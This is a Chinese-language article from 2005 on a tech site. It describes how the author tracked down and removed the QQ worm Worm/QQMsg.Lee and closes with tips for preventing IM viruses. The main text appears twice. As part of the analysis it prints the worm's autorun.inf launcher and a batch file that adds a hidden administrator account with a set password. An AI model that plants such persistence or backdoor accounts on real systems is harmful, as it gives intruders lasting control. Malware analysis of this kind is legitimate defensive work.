类自启动病毒QQ乐Worm/QQMsg.Lee攻防实战
时间:2005-09-22 | 作者:华军软件园 | 阅读:126
笔者最近遇到一个采取另类方式启动的病毒——QQ乐(Worm/QQMsg.Lee),现把一波三折的查杀过程和一些经验写出来,供朋友们参考。
某日在QQ里连续收到一位朋友发来的消息,该消息中都带有一串网址,经证实并不是他主动发来的,于是怀疑他的电脑中了病毒。笔者首先打开金山网镖防火墙,检查发现一个正在访问网络的可疑程序“System32.exe”,通过名字可以看出它是想与System32文件夹相混淆,于是点击右上角的“结束进程”杀掉它。然后按图索骥到C盘根目录下找到并删除它,接着打开了注册表编辑器。因为一般木马和病毒都喜欢在这里添加自启动键值,但是检查了所有以RUN为开头的项都没有与这个文件相关联的启动项,看来这个病毒十分狡猾。
接着在资源管理器中检查Win.ini和System.ini,因为有些病毒会在Win.ini中的[Windows]小节下的load和run字段后面,以及System.ini中的[boot]小节的Shell=Explorer.exe后面添加启动项,以便每次开机时自动运行。谁知这些地方仍然一无所获,不过却意外发现系统中多出了一个管理员账户“Lee”,怀疑是病毒添加的,于是删除它。
正在笔者为找不到毒源而纳闷时,进程中又重新出现了病毒文件“System32.exe”,而且被删除的账户也重新恢复。看来如果不找到病毒的启动机制,就难以彻底制服它。于是笔者打开“搜索”,在“文件中的一个字或词组”(这里可以搜索文件内部的内容)一栏中输入“System32.exe”,经过一番等待,在搜索结果中发现了数个“AutoRun.inf”文件,用记事本打开它,内容为:
[autorun]
open=System32.exe
原来病毒自启动的根源在这儿。感染病毒后它会在每个分区的根目录下创建Autorun.inf文件和病毒体System32.exe、System32dll.dll,使得每次双击盘符打开时病毒都会自动运行(原理与自启动光盘相同),这种方法确实比在注册表中添加启动项更不容易被发现。笔者接着又利用前面的搜索方法,查找“Lee”这个关键字,结果发现了一个自动创建管理员账户的批处理文件“Admin.bat”。用记事本打开它,内容如下:
net user lee abcd1234!@# /add
net localgroup administrators lee /add
通过内容可以看出病毒是要增加一个名为lee,密码为abcd1234!@#的新账户,然后将它加入管理员组中(即赋予管理员权限)。毒根找到了,下面就可以大开“杀戒”了,把找到的这些文件统统删除。
IM病毒防范技巧:
1. 用QQ等即时通讯工具聊天时,除了开启病毒和网络防火墙以外,还要打开嵌入式防火墙,例如金山毒霸6中的“腾讯QQ、MSN Messenger、ICQ安全助手”。至少要把金山网镖等防火墙的安全级别设置到中以上,才能更有效拦截木马程序和网络攻击。
2. 不要随意点击QQ中的链接,因为许多病毒都会伪装成网页链接,并通过消息中具有欺骗和诱惑的文字让你去点击,例如QQ小尾巴。
某日在QQ里连续收到一位朋友发来的消息,该消息中都带有一串网址,经证实并不是他主动发来的,于是怀疑他的电脑中了病毒。笔者首先打开金山网镖防火墙,检查发现一个正在访问网络的可疑程序“System32.exe”,通过名字可以看出它是想与System32文件夹相混淆,于是点击右上角的“结束进程”杀掉它。然后按图索骥到C盘根目录下找到并删除它,接着打开了注册表编辑器。因为一般木马和病毒都喜欢在这里添加自启动键值,但是检查了所有以RUN为开头的项都没有与这个文件相关联的启动项,看来这个病毒十分狡猾。
接着在资源管理器中检查Win.ini和System.ini,因为有些病毒会在Win.ini中的[Windows]小节下的load和run字段后面,以及System.ini中的[boot]小节的Shell=Explorer.exe后面添加启动项,以便每次开机时自动运行。谁知这些地方仍然一无所获,不过却意外发现系统中多出了一个管理员账户“Lee”,怀疑是病毒添加的,于是删除它。
正在笔者为找不到毒源而纳闷时,进程中又重新出现了病毒文件“System32.exe”,而且被删除的账户也重新恢复。看来如果不找到病毒的启动机制,就难以彻底制服它。于是笔者打开“搜索”,在“文件中的一个字或词组”(这里可以搜索文件内部的内容)一栏中输入“System32.exe”,经过一番等待,在搜索结果中发现了数个“AutoRun.inf”文件,用记事本打开它,内容为:
[autorun]
open=System32.exe
原来病毒自启动的根源在这儿。感染病毒后它会在每个分区的根目录下创建Autorun.inf文件和病毒体System32.exe、System32dll.dll,使得每次双击盘符打开时病毒都会自动运行(原理与自启动光盘相同),这种方法确实比在注册表中添加启动项更不容易被发现。笔者接着又利用前面的搜索方法,查找“Lee”这个关键字,结果发现了一个自动创建管理员账户的批处理文件“Admin.bat”。用记事本打开它,内容如下:
net user lee abcd1234!@# /add
net localgroup administrators lee /add
通过内容可以看出病毒是要增加一个名为lee,密码为abcd1234!@#的新账户,然后将它加入管理员组中(即赋予管理员权限)。毒根找到了,下面就可以大开“杀戒”了,把找到的这些文件统统删除。
IM病毒防范技巧:
1. 用QQ等即时通讯工具聊天时,除了开启病毒和网络防火墙以外,还要打开嵌入式防火墙,例如金山毒霸6中的“腾讯QQ、MSN Messenger、ICQ安全助手”。至少要把金山网镖等防火墙的安全级别设置到中以上,才能更有效拦截木马程序和网络攻击。
2. 不要随意点击QQ中的链接,因为许多病毒都会伪装成网页链接,并通过消息中具有欺骗和诱惑的文字让你去点击,例如QQ小尾巴。
福利游戏
相关文章
更多-
- qq飞车手游休闲区挂机有经验吗
- 时间:2024-10-10
-
- qq音乐怎么全屏歌词
- 时间:2024-10-08
-
- qq飞车手游休闲区怎么飞行
- 时间:2024-10-08
-
- qq飞车手游安卓和苹果数据互通吗 安卓和苹果可不可以一起玩
- 时间:2024-10-05
-
- qq飞车手游未来序列多少钱
- 时间:2024-10-02
-
- qq飞车手游许愿池多少次满
- 时间:2024-10-01
-
- qq飞车手游荣耀勋章多久一期
- 时间:2024-09-30
-
- qq飞车手游怎么快速获取点券
- 时间:2024-09-26
精选合集
更多大家都在玩
大家都在看
更多-
- 以闪亮之名顾苏澄鉴赏家怎么样
- 时间:2024-11-23
-
- 以闪亮之名辰祈夜谭怎么样
- 时间:2024-11-23
-
- 以闪亮之名星钥分解商店怎么样
- 时间:2024-11-23
-
- 《Cosmic Royale》Steam页面 12月12日发行
- 时间:2024-11-23
-
- 公会管理冒险游戏《The Blue Cut Hook》Steam页面开放 明年发售
- 时间:2024-11-23
-
- 无期迷途胡椒有群小羔羊怎么样
- 时间:2024-11-23
-
- 光遇中国绊爱联动直播怎么玩
- 时间:2024-11-23
-
- 以闪亮之名银月漫游礼包怎么样
- 时间:2024-11-23